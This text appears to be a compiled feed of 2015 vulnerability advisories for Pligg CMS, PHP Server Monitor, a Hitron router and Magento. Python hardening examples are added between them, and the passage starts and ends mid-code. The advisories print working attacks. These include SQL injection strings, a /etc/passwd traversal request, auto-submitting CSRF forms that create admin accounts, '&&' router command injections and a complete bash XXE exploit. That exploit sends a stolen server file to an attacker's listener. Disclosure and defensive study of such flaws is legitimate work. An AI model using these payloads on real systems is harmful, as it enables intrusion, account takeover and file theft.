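    union = "1 union all select user_id, user_login, user_pass, user_pass from users"
    tagged = "1<x' or 1=1--></x>"           # strips to "1", passes isdigit(), injects as-is
    out = {
        "union_leaks_password": any("hash-of-admin-password" in r
                                    for r in comments_vulnerable(db, 1, union)),
        "fixed_union_rows": len(comments_fixed(db, 1, union)),
        "blind_true_rows": len(user_vulnerable(db, "1 AND 1=1")),   # 1 row
        "blind_false_rows": len(user_vulnerable(db, "1 AND 1=0")),  # 0 rows: the oracle
        "tag_bypass_rows": len(files_vulnerable(db, tagged)),       # every file row
    }
    try:
        files_fixed(db, tagged)
        out["fixed_rejects_tagged"] = False
    except ValueError:
        out["fixed_rejects_tagged"] = True
    return out


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(f"{k:24} {v}")
```

The escaped-but-unquoted case is worth remembering when reviewing code: an escape function is only meaningful for a value that sits between quote characters, and a numeric column compared with a bare interpolated value gives the attacker a full expression context.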
6. Solution
This issue was not fixed by the vendor.
7. Report Timeline
09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been sent to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Multiple-SQL-Injections-82.html
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Pligg CMS 2.0.2
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://pligg.com/
Vulnerability Type: Directory Traversal
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
The editor delivered with Pligg CMS is vulnerable to directory traversal, which
gives an attacker that obtained admin credentials the opportunity to view any
file stored on the webserver that the webserver user has access to.
Please note that admin credentials are required.
3. Proof of Concept
POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1
the_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&open=Open
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been sent to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Directory-Traversal-81.html
<!--
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-PRIV-ESCALATE.txt
Vendor:
================================
www.phpservermonitor.org
sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download
Product:
================================
PHP Server Monitor 3.1.1
Vulnerability Type:
=================================
Privilege Escalation / CSRF
Vulnerability Details:
=====================
PHP Server Monitor uses level 20 for basic users and level 10 for administrators; these levels are stored in the database. A basic user can elevate their privileges to those of an administrator
by crafting an HTTP request that changes their level to '10' and then getting an administrator to click a link or visit a malicious website that submits it as a
CSRF attack, which grants the user admin access. This problem is due to no CSRF protection mechanism being in place.
Exploit code(s):
===============
1) privilege escalation / CSRF
-->
<!DOCTYPE>
<html>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>
<form id="HELL" action="http://localhost/phpservermon-3.1.1/?&mod=user&action=save&id=3" method="post">
<input type="text" name="user_name" value="hyp3rlinx" >
<input type="text" name="name" value="hyp3rlinx">
<input type="text" name="level" value="10">
<input type="text" name="password" value="">
<input type="text" name="password_repeat" value="">
<input type="text" name="email" value="ghostofsin@abyss.com">
<input type="text" name="mobile" value="">
<input type="text" name="pushover_key" value="">
<input type="text" name="pushover_device" value="">
</form>
</body>
</html>
<!--
Exploitation Technique:
=======================
Remote
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Oct 30, 2015 : Public Disclosure
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST
Vulnerable Product: [+] PHP Server Monitor 3.1.1
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.
by hyp3rlinx
-->
# Exploit title: Hitron Router (CGN3ACSMR) - Remote Code Execution
# Author: Dolev Farhi (dolevf at protonmail.ch)
# Date: 29-10-2015
# Vendor homepage: http://www.hitrontech.com/en/index.php
# Software version: 4.5.8.16
# Hardware version: 1A
# Details:
Hitron routers provide an interface to test connectivity (ping, tracert) from the router's graphical Management UI.
This interface is vulnerable to command injection: appending && and a command after the IP address in the Destination field causes that command to be executed on the router.
# Steps to reproduce:
1. Navigate to the dashboard
2. Navigate to the admin tab
3. Type an IP address in the Destination form
4. Append any command you want after the IP address, separated by &&.
Example one:
8.8.8.8 && cat /etc/passwd
Result
root:$1$27272727:0:0::/:/bin/false
nobody:$1$27272727:65535:65535::/:/bin/false
rogcesadmin:filtered/:100:100::/:/usr/sbin/cli
=============Complete==============
Example two (the output is a BusyBox process listing, i.e. the result of ps):
8.8.8.8 && ps
PID USER VSZ STAT COMMAND
1 root 1268 S init
2 root 0 SW [kthreadd]
3 root 0 SW [ksoftirqd/0]
5 root 0 SW [kworker/u:0]
6 root 0 SW< [khelper]
7 root 0 SW [irq/74-hw_mutex]
8 root 0 SW [sync_supers]
9 root 0 SW [bdi-default]
10 root 0 SW< [kblockd]
11 root 0 SW< [gPunitWorkqueue]
12 root 0 SW [irq/79-punit_in]
13 root 0 SW [kswapd0]
14 root 0 SW< [crypto]
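The pattern behind the behaviour above and its hardened counterpart, as an added Python example (not the advisory's and not Hitron's firmware code): the first function splices the Destination value into one command line that a shell interprets, so && ends the ping and starts a new command; the second validates the destination as an IP address or hostname and passes it as a separate argv element with no shell involved. The function names and the "ping -c 3" options are assumptions.

```python
import ipaddress
import re
import subprocess
from typing import List

# One RFC 1123 hostname label: letters, digits and hyphens, no leading or
# trailing hyphen, 1..63 characters.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def build_ping_shell_command(destination: str) -> str:
    """Vulnerable pattern: the Destination field is spliced into one command
    line that a shell will interpret. With '8.8.8.8 && cat /etc/passwd' the
    shell runs ping and then, because ping succeeded, cat /etc/passwd, which
    is exactly the behaviour shown above.
    """
    return "ping -c 3 " + destination


def is_valid_destination(destination: str) -> bool:
    """Allow-list check: a literal IPv4/IPv6 address or a well-formed
    hostname, nothing else. Spaces, '&', ';', '|', '`' and '$' cannot pass."""
    try:
        ipaddress.ip_address(destination)
        return True
    except ValueError:
        pass
    if not destination or len(destination) > 253:
        return False
    labels = destination.rstrip(".").split(".")
    return all(_LABEL.match(label) for label in labels)


def build_ping_argv(destination: str) -> List[str]:
    """Hardened pattern: validate, then hand ping an argv list. No shell
    parses the list, so metacharacters carry no meaning even if validation
    were wrong; '--' stops ping from reading a value that starts with '-'
    as an option (validation already forbids that, this is belt and braces).
    """
    if not is_valid_destination(destination):
        raise ValueError("refusing to ping %r" % destination)
    return ["ping", "-c", "3", "--", destination]


def run_ping(destination: str) -> subprocess.CompletedProcess:
    """Execute the hardened form. shell=False is the default; it is spelled
    out because it is the whole point."""
    return subprocess.run(
        build_ping_argv(destination), shell=False, capture_output=True, text=True, timeout=20
    )
```

Quoting the value for the shell (shlex.quote in Python, escapeshellarg in PHP) would also neutralise the && sequence, but an argv list removes the shell from the path entirely, and the allow-list on its own already stops the advisory's payloads, which all contain characters no hostname or address can.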
=============================================
- Release date: 29.10.2015
- Discovered by: Dawid Golunski
- Severity: High/Critical
- eBay Magento ref.: APPSEC-1045
=============================================
I. VULNERABILITY
-------------------------
eBay Magento CE <= 1.9.2.1 XML eXternal Entity Injection (XXE) on PHP FPM
eBay Magento EE <= 1.14.2.1
II. BACKGROUND
-------------------------
- eBay Magento eCommerce
http://magento.com/
"More than 240,000 merchants worldwide put their trust in our eCommerce
software. Magento's eCommerce platform gives you the tools you need to attract
more prospects, sell more products, and make more money. It's what we do.
We're owned by eBay, so you know we're eCommerce experts"
- PHP FPM
http://php.net/manual/en/install.fpm.php
"FPM (FastCGI Process Manager) is an alternative PHP FastCGI implementation with
some additional features (mostly) useful for heavy-loaded sites."
Starting from release 5.3.3 in early 2010, PHP merged the php-fpm fastCGI
process manager into its codebase.
III. INTRODUCTION
-------------------------
eBay Magento eCommerce application uses Zend Framework which has a
vulnerability that allows for XML eXternal Entity injection in applications
served with PHP FPM.
An XXE (XML eXternal Entity) attack is an attack on an application that parses XML
input from untrusted sources with an incorrectly configured XML parser.
The application may be forced to open arbitrary files and/or network resources.
Exploiting XXE issues on PHP applications may also lead to denial of service or
in some cases (e.g. when an 'expect' PHP module is installed) lead to command
execution.
IV. DESCRIPTION
-------------------------
The aforementioned XXE vulnerability in Zend Framework which affects eBay
Magento, was assigned a CVE-ID of CVE-2015-5161 and can be found in a
separate advisory at:
http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt
In short, the Zend Framework XXE vulnerability stems from an insufficient
sanitisation of untrusted XML data on systems that use PHP-FPM to serve PHP
applications.
By using certain multibyte encodings within XML, it is possible to bypass
the sanitisation and perform certain XXE attacks.
Since eBay Magento is based on Zend Framework and uses several of its XML
classes, it also inherits this XXE vulnerability.
The vulnerability in Zend affects all of its XML components; however, two of
those components:
- Zend_XmlRpc_Server
- Zend_SOAP_Server
are of special interest to attackers as they could be exploited remotely
without any authentication.
Magento implements a store API providing XML/SOAP web services.
Although Zend_XmlRpc is present within the Magento code base, testing
revealed that an older Zend class was used for the XML-RPC implementation,
which is not vulnerable.
However, further testing revealed that Magento SOAP API was implemented using
the Zend_SOAP_Server class from Zend Framework, which is vulnerable to the
XXE injection vulnerability discovered earlier.
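Why a multibyte encoding defeats a byte-level scan, as an added Python example (not from the advisory, and not Zend Framework's actual code): naive_entity_scan is a simplified stand-in for a check that looks for the ASCII bytes of "<!ENTITY" in the raw request body; the same document transcoded to UTF-16, as the exploit's iconv step does, slips past it while libxml2 still decodes and expands the entity. The hardened scan first makes the same encoding decision a parser makes (byte order mark, then the byte pattern of the XML declaration) and only then looks for the declaration in decoded text. The sample documents are constructed here.

```python
import re

# Constructed sample documents: the same DTD that declares a parameter entity,
# once as UTF-8 and once transcoded to UTF-16 the way iconv -t UTF-16 does.
DTD_WITH_ENTITY = (
    '<?xml version="1.0"?>\n'
    "<!DOCTYPE foo [\n"
    '  <!ENTITY % xxe SYSTEM "file:///dev/random">\n'
    "  %xxe;\n"
    "]>\n"
    "<foo/>\n"
)
CLEAN_DOC = '<?xml version="1.0"?>\n<foo><bar>hi</bar></foo>\n'

PAYLOAD_UTF8 = DTD_WITH_ENTITY.encode("utf-8")
PAYLOAD_UTF16 = DTD_WITH_ENTITY.encode("utf-16")  # BOM followed by UTF-16 code units

_ENTITY_RE = re.compile(r"<!(ENTITY|DOCTYPE)", re.IGNORECASE)


def naive_entity_scan(raw: bytes) -> bool:
    """Stand-in for the bypassed check: look for the ASCII bytes of '<!ENTITY'
    in the raw body. In UTF-16 every ASCII character is paired with a NUL
    byte, so those eight bytes never occur back to back and the scan reports
    the document clean, while libxml2, which honours the BOM, decodes and
    expands the entity anyway.
    """
    return b"<!ENTITY" in raw.upper()


def sniff_encoding(raw: bytes) -> str:
    """Make the encoding decision an XML parser makes before it sees any
    characters: byte order mark first, then the byte pattern of the '<?xml'
    declaration, otherwise UTF-8 (the XML default).
    """
    if raw.startswith(b"\xff\xfe\x00\x00"):
        return "utf-32-le"
    if raw.startswith(b"\x00\x00\xfe\xff"):
        return "utf-32-be"
    if raw.startswith(b"\xff\xfe") or raw.startswith(b"<\x00?\x00"):
        return "utf-16-le"
    if raw.startswith(b"\xfe\xff") or raw.startswith(b"\x00<\x00?"):
        return "utf-16-be"
    if raw.startswith(b"<\x00\x00\x00"):
        return "utf-32-le"
    if raw.startswith(b"\x00\x00\x00<"):
        return "utf-32-be"
    return "utf-8"


def encoding_aware_entity_scan(raw: bytes) -> bool:
    """Hardened check: transcode to text using the parser's own encoding
    decision, then look for a DOCTYPE or ENTITY declaration in the decoded
    characters. Rejecting DOCTYPE as well as ENTITY is stricter than the
    message quoted below and also closes the door on external DTDs.
    """
    text = raw.decode(sniff_encoding(raw), errors="replace")
    return _ENTITY_RE.search(text) is not None


def accept_soap_body(raw: bytes) -> bool:
    """What a SOAP endpoint should decide before handing the body to libxml2."""
    return not encoding_aware_entity_scan(raw)
```

The scan is a last line of defence; the primary fix is a parser that never resolves external entities or loads a DTD, so that a declaration which does reach libxml2 is inert rather than merely detected.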
V. PROOF OF CONCEPT
-------------------------
Normally, when an XML containing entities is supplied to magento SOAP API, the
following message gets produced:
<SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>Sender</faultcode>
<faultstring>Detected use of ENTITY in XML, disabled to prevent XXE/XEE
attacks</faultstring></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>
Below is a POC exploit that automates the steps necessary to bypass this
protection on Magento served with PHP-FPM, and remotely exploit the XXE issue
in Magento's SOAP API without authentication.
Authentication is not required for the exploitation, as Magento first needs to
load the malicious XML data in order to read credentials within the SOAP
login method. Loading malicious XML may be enough to trigger attacker's payload
within the entities (in case of libxml2 library auto-expanding entities).
---[ magento-soap-exploit.sh ]---
#!/bin/bash
#
# POC Exploit (v1.1)
#
# eBay Magento CE <= 1.9.2.1 XML eXternal Entity Injection (XXE) on PHP-FPM
# eBay Magento EE <= 1.14.2.1
#
# CVE-2015-5161
#
# Credits:
#
# Dawid Golunski
# dawid (at) legalhackers.com
# http://legalhackers.com
#
# Advisories:
#
# http://legalhackers.com/advisories/eBay-Magento-XXE-Injection-Vulnerability.txt
# http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt
#
# Usage:
#
# [Vulnerability test]
#
# This is to test the vulnerability with a simple XXE payload which retrieves the
# /dev/random file and causes a time out. No receiver server is required in this
# test as no data is returned.
#
# Run the script with just the URL to Magento SOAP API, with no other parameters.
# E.g:
# ./magento-soap-exploit.sh http://apache-phpfpm/magento/index.php/api/soap/index
#
#
# [File retrieval from the remote server]
#
# ./magento-soap-exploit.sh MAGENTO_SOAP_API_URL FILE_PATH RECEIVER_HOST RECEIVER_PORT
#
# E.g:
# ./magento-soap-exploit.sh http://apache-phpfpm/magento/index.php/api/soap/index /etc/hosts 192.168.10.5 80
#
# In this example, file extracted via the XXE attack will be sent as base64 encoded parameter to:
# http://192.168.10.5:80/fetch.php?D=[base64_string]
# You should have the receiver server/script listening on the specified port before running this exploit.
#
TIMEOUT=6
PAYLOAD_TMP_FILE="/tmp/payload-utf16.xml"
if [ $# -ne 1 ] && [ $# -ne 4 ] ; then
echo -e "\nUsage: \n"
echo -e "[Vulnerability test]\n"
echo -e "$0 MAGENTO_SOAP_API_URL"
echo -e "E.g:"
echo -e "$0 http://fpmserver/magento/index.php/api/soap/index\n";
echo -e "[File retrieval]\n"
echo -e "$0 MAGENTO_SOAP_API_URL FILE_PATH RECEIVER_HOST RECEIVER_PORT"
echo -e "E.g:"
echo -e "$0 http://fpmserver/magento/index.php/api/soap/index /etc/hosts 192.168.5.6 80\n";
exit 2;
else
TARGETURL="$1"
fi
if [ $# -eq 4 ]; then
FILE="$2"
RECEIVER_HOST="$3"
RECEIVER_PORT="$4"
TEST_ONLY=0
else
TEST_ONLY=1
fi
if [ $TEST_ONLY -eq 1 ]; then
# Vulnerability test
# Perform only a test by reading /dev/random file
TEST_PAYLOAD_XML='<?xml version="1.0" encoding="UTF-16"?>
<!DOCTYPE foo [
<!ELEMENT PoC ANY >
<!ENTITY % xxe SYSTEM "file:///dev/random" >
%xxe;
]>'
echo "$TEST_PAYLOAD_XML" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE
echo -e "Target URL: $TARGETURL\nInjecting Test XXE payload (/dev/random). Might take a few seconds.\n"
# Fetching /dev/random should cause the remote script to block
# on reading /dev/random until the script times out.
# If there is no delay it means the remote script is not vulnerable or
# /dev/random is not accessible.
START=$(date +%s)
wget -t 1 -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE
END=$(date +%s)
DIFF=$(expr $END \- $START )
if [ $DIFF -eq $TIMEOUT ]; then
echo "Vulnerable. No response from Magento for $DIFF seconds :)"
exit 0
else
echo "Not vulnerable, or there is no /dev/random on the remote server ;)"
exit 1
fi
else
# File retrieval XXE payload
SEND_DTD="<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!ENTITY % all \"<!ENTITY % send SYSTEM 'php://filter/read=/resource=http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php?D=%file;'>\">
%all;"
SEND_DTD_B64="$(echo "$SEND_DTD" | base64 -w0)"
FILE_PAYLOAD_XML="<?xml version=\"1.0\" encoding=\"UTF-16\"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM \"php://filter/convert.base64-encode/resource=$FILE\">
<!ENTITY % dtd SYSTEM \"data://text/plain;base64,$SEND_DTD_B64\">
%dtd;
%send;
]>"
# Retrieve $FILE from the remote server and send it to $RECEIVER_HOST:$RECEIVER_PORT
echo "$FILE_PAYLOAD_XML" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE
echo -e "Target URL: $TARGETURL\n\nInjecting XXE payload to retrieve the $FILE file..."
echo -e "If successful, Base64 encoded result will be sent to http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php?D=[base64_result]\n"
echo -e "If in doubt, try the vulnerability test option.\n"
wget -t 1 -v -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE
fi
--------------------------------
The above exploit uses an out-of-band XXE payload which sends any retrieved
data back to the attacker, since the attacker cannot see the resulting file
in the server's response directly.
This exploit also bypasses the LIBXML_NONET libxml setting imposed by the Zend
Framework which prohibits network access. This is achieved through the usage of
php://filter wrapper which is treated as a local resource by the XML ENTITY
handler even though it references remote resources.
Successful exploitation in a test mode ('Vulnerability test', exploit run
without parameters other than the URL to Magento SOAP API) will result in a
time out and an internal server error caused by the XML ENTITY accessing
/dev/random file which will block the API script.
For example:
---
$ ./magento-soap-exploit.sh http://vulnhost/magento/index.php/api/soap/index
Target URL: http://vulnhost/magento/index.php/api/soap/index
Injecting Test XXE payload (/dev/random). Might take a few seconds.
--2015-05-19 22:14:17-- http://vulnhost/magento/index.php/api/soap/index
Resolving precise (vulnhost)... 127.0.0.1
Connecting to vulnhost (vulnhost)|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... Read error (Connection timed out) in
headers. Giving up.
Vulnerable. No response from Magento for 6 seconds :)
---
Arbitrary file accessible to the PHP process can also be fetched with the
above exploit by using the following syntax:
---
attacker$ ./magento-soap-exploit.sh http://vulnhost/magento/index.php/api/soap/index /etc/passwd attackershost 9090
Target URL: http://vulnhost/magento/index.php/api/soap/index
Injecting XXE payload to retrieve the /etc/passwd file...
If successful, Base64 encoded result will be sent to http://attackershost:9090/fetch.php?D=[base64_result]
If in doubt, try the vulnerability test option.
--2015-05-19 22:33:06-- http://vulnhost/magento/index.php/api/soap/index
Resolving vulnhost (vulnhost)... 192.168.57.12
Connecting to vulnhost (vulnhost)|192.168.57.12|:80... connected.
HTTP request sent, awaiting response... Read error (Connection timed out) in
headers. Giving up.
---
The result will be sent to attacker's server listening on port 9090 which
needs to be set up before running the exploit:
---
attacker# nc -vv -l 9090
Listening on [0.0.0.0] (family 0, port 9090)
Connection from [192.168.57.12] port 9090 [tcp/*] accepted (family 2, sport 47227)
GET /fetch.php?D=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovY[...cut...] HTTP/1.0
Host: attackershost:9090
attacker# echo 'cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovY' | base64 -d
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]
---
It may also be possible to execute arbitrary commands on the remote server
if the remote PHP installation has the 'expect' extension enabled.
In that case an attacker could use the expect:// wrapper within an XML ENTITY
to execute any command in the context of the PHP process.
For example, the entity declaration
<!ENTITY % file SYSTEM "expect://id">
would execute the /usr/bin/id command on the remote Magento host.
VI. BUSINESS IMPACT
-------------------------
This issue should be marked as high/critical due to the wide deployment of
eBay Magento software, low complexity of exploitation, as well as a possibility
of an unauthenticated remote exploitation as demonstrated in this advisory.
If successful, an attacker could access sensitive files available to the
web server process, cause Denial Of Service, or even execute arbitrary commands
on the server with the permissions of the PHP/web process if certain PHP
modules are installed.
There is also a growing number of servers set up to serve PHP code with
PHP-FPM, especially in web hosting environments which need to respond to heavy
load.
There are official Magento tutorials explaining how to set up Magento with Nginx
and PHP FPM for best performance:
http://info.magento.com/rs/magentocommerce/images/MagentoECG-PoweringMagentowithNgnixandPHP-FPM.pdf
VII. SYSTEMS AFFECTED
-------------------------
Versions of eBay Magento CE equal to 1.9.2.1, or older can be exploited on a
web server with PHP-FPM SAPI.
eBay Magento EE was not tested, but is also affected by this issue according
to the vendor (see APPSEC-1045), up to version EE 1.14.2.1.
To be exploitable, the system must have a version of libxml library which
expands XML entities without additional libxml2 settings. This is true for
older versions, as well as newer versions of libxml2 with missing updates,
such as a fairly recent patch for the issue of CVE-2014-0191.
For some distributions (see references below) libxml2 patches were released
as late as April 2015, and for this reason there are likely many systems
which still lack the libxml2 updates and allow the Magento/Zend
vulnerability described in this advisory to be exploited.
The exploit does not, however, depend on the installed PHP version. In fact,
it was confirmed to work on Fedora 21 with a then-current (about a month old)
PHP build:
PHP Version => 5.6.14
Build Date => Sep 30 2015 13:53:16
The issue can also be exploited on multiple web servers, as PHP-FPM can be set
up on popular web servers such as Apache, or Nginx on Linux/Unix, as well as
Windows systems (as per the 'fpm on cygwin' setup guides available on the
Internet).
VIII. SOLUTION
-------------------------
eBay Magento was informed about the issue and assigned it a reference ID of
APPSEC-1045. eBay released a patch bundle titled:
'SUPEE-6788 Patch Bundle'
prior to the release of this advisory.
To address the vulnerability, the patch should be installed, or Magento should
be upgraded to the latest version of 1.9.2.2 which already contains the fix.
IX. REFERENCES
-------------------------
http://legalhackers.com/advisories/eBay-Magento-XXE-Injection-Vulnerability.txt
http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt
http://framework.zend.com/security/advisory/ZF2015-06
Powering Magento with Ngnix and PHP-FPM:
http://info.magento.com/rs/magentocommerce/images/MagentoECG-PoweringMagentowithNgnixandPHP-FPM.pdf
http://www.securiteam.com/
http://seclists.org/fulldisclosure/2015/Oct/105
Official eBay Magento website:
http://magento.com/
Patch 'SUPEE-6788 Patch Bundle', addressing 'XXE/XEE Attack on Zend XML
Functionality Using Multibyte Payloads' (APPSEC-1045) is available at:
http://merch.docs.magento.com/ce/user_guide/magento/patch-releases-2015.html
CVE-2014-0191 :
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0191
https://bugzilla.redhat.com/show_bug.cgi?id=1090976
X. DISCOVERED BY
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
Oct 29th, 2015: Advisory released
Nov 3rd, 2015: Updated exploit to work on newer libxml2 versions such as
2.9.1 without CVE-2014-0191 patch, updated 'Systems affected'
section, plus minor updates in other sections
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-CSRF.txt
Vendor:
================================
www.phpservermonitor.org
sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download
Product:
================================
PHP Server Monitor 3.1.1
Vulnerability Type:
=================================
Cross site request forgery (CSRF)
Vulnerability Details:
=====================
Multiple CSRF issues in PHP Server Monitor allow remote attackers to add
arbitrary users and servers to the system, modify the system configuration
and delete arbitrary servers, if a logged-in user (admin) visits our
malicious website or clicks on our infected links. As no CSRF protection is
used in the application, we can make requests on the victim's behalf and the
server will happily process our malicious HTTP requests.
Exploit code(s):
===============
<!DOCTYPE>
<html>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>
1) add arbitrary users to the system:
<form id="HELL" action="
http://localhost/phpservermon-3.1.1/?&mod=user&action=save&id=0"
method="post">
<input type="text" name="user_name" value="hyp3rlinx" >
<input type="text" name="name" value="hyp3rlinx">
<input type="text" name="level" value="20">
<input type="text" name="password" value="abc123">
<input type="text" name="password_repeat" value="abc123">
<input type="text" name="email" value="ghostofsin@abyss.com">
<input type="text" name="mobile" value="">
<input type="text" name="pushover_key" value="">
<input type="text" name="pushover_device" value="">
</form>
2) add arbitrary servers to the system:
<form id="HELL" action="
http://localhost/phpservermon-3.1.1/?&mod=server&action=save&id=0&back_to="
method="post">
<input type="text" name="label" value="HELL" >
<input type="text" name="ip" value="malicious-domain.hell">
<input type="text" name="type" value="service">
<input type="text" name="port" value="666">
<input type="text" name="pattern" value="">
<input type="text" name="warning_threshold" value="1">
<input type="text" name="timeout" value="">
<input type="text" name="active" value="yes">
<input type="text" name="email" value="yes">
<input type="text" name="sms" value="yes">
<input type="text" name="pushover" value="yes">
</form>
3) modify system configuration:
<form id="HELL" action="
http://localhost/phpservermon-3.1.1/index.php?mod=config&action=save"
method="post">
<input type="text" name="language" value="en_US" >
<input type="text" name="show_update%5B%5D=" value="on">
<input type="text" name="auto_refresh_servers" value="0">
<input type="text" name="alert_type" value="status">
<input type="text" name="log_status%5B%5D" value="on">
<input type="text" name="log_retention_period" value="1">
<input type="text" name="email_status%5B%5D" value="on">
<input type="text" name="log_email%5B%5D" value="on">
<input type="text" name="email_from_name" value="ghostofsin">
<input type="text" name="email_from_email" value="abysmalgodz@abyss.com">
<input type="text" name="email_smtp_port" value="25">
<input type="text" name="email_smtp_security" value="">
<input type="text" name="email_smtp_username" value="">
<input type="text" name="email_smtp_password" value="">
<input type="text" name="test_email" value="1">
<input type="text" name="log_sms%5B%5D" value="on">
<input type="text" name="sms_gateway" value="whatever">
<input type="text" name="sms_gateway_username" value="username">
<input type="text" name="sms_gateway_password" value="password">
<input type="text" name="sms_from" value="1234567890">
<input type="text" name="test_sms" value="0">
<input type="text" name="sms_from" value="1234567890">
<input type="text" name="log_pushover%5B%5D" value="0">
<input type="text" name="pushover_api_token" value="">
<input type="text" name="test_pushover" value="0">
</form>
</body>
</html>
4) arbitrary server deletion via GET request:
http://localhost/sectest/phpservermon-3.1.1/?&mod=server&action=delete&id=2
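The control whose absence both PHP Server Monitor advisories on this page exploit (the level-10 privilege escalation above and the user/server/config/delete forgeries here), as an added Python example that is not hyp3rlinx's code nor the project's: a per-session random token embedded in every state-changing form and checked with a constant-time comparison, state changes refused on GET, and Origin/Referer checked as a secondary signal. Session and header handling are sketched with plain dictionaries; the site origin and function names are assumptions.

```python
import hmac
import html
import secrets
from typing import Mapping, MutableMapping
from urllib.parse import urlparse


class CsrfError(Exception):
    """The request did not prove that one of our own pages made it."""


STATE_CHANGING_METHODS = ("POST", "PUT", "PATCH", "DELETE")


def issue_csrf_token(session: MutableMapping[str, str]) -> str:
    """Create once per session, then reuse, a random token that every
    state-changing form embeds as a hidden field. A page on another origin
    can auto-submit a form at us, but it cannot read our responses, so it
    never learns this value and cannot include it."""
    token = session.get("csrf_token")
    if token is None:
        token = secrets.token_urlsafe(32)
        session["csrf_token"] = token
    return token


def render_hidden_token_field(session: MutableMapping[str, str]) -> str:
    """The extra <input> the user, server and config forms are missing."""
    return '<input type="hidden" name="csrf_token" value="%s">' % html.escape(
        issue_csrf_token(session), quote=True
    )


def _same_origin(url: str, site_origin: str) -> bool:
    parsed = urlparse(url)
    return "%s://%s" % (parsed.scheme, parsed.netloc) == site_origin.rstrip("/")


def verify_state_change(
    session: Mapping[str, str],
    form: Mapping[str, str],
    headers: Mapping[str, str],
    method: str,
    site_origin: str,
) -> bool:
    """Gate for every save/delete handler. Each forgery in the advisories
    trips a different check:
      - ?mod=server&action=delete via a plain link -> GET refused;
      - auto-submitted form without the token      -> token missing;
      - right token but submitted from elsewhere   -> Origin/Referer mismatch.
    Returns True when the request may proceed, raises CsrfError otherwise.
    """
    if method.upper() not in STATE_CHANGING_METHODS:
        raise CsrfError("state-changing actions must not be reachable with GET")

    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    # compare_digest keeps the comparison constant-time; it only accepts ASCII
    # str or bytes, and the form value is attacker-chosen, hence the encode().
    if not expected or not supplied or not hmac.compare_digest(
        expected.encode(), str(supplied).encode()
    ):
        raise CsrfError("missing or invalid CSRF token")

    # Secondary check: browsers send Origin on cross-site POSTs (Referer as a
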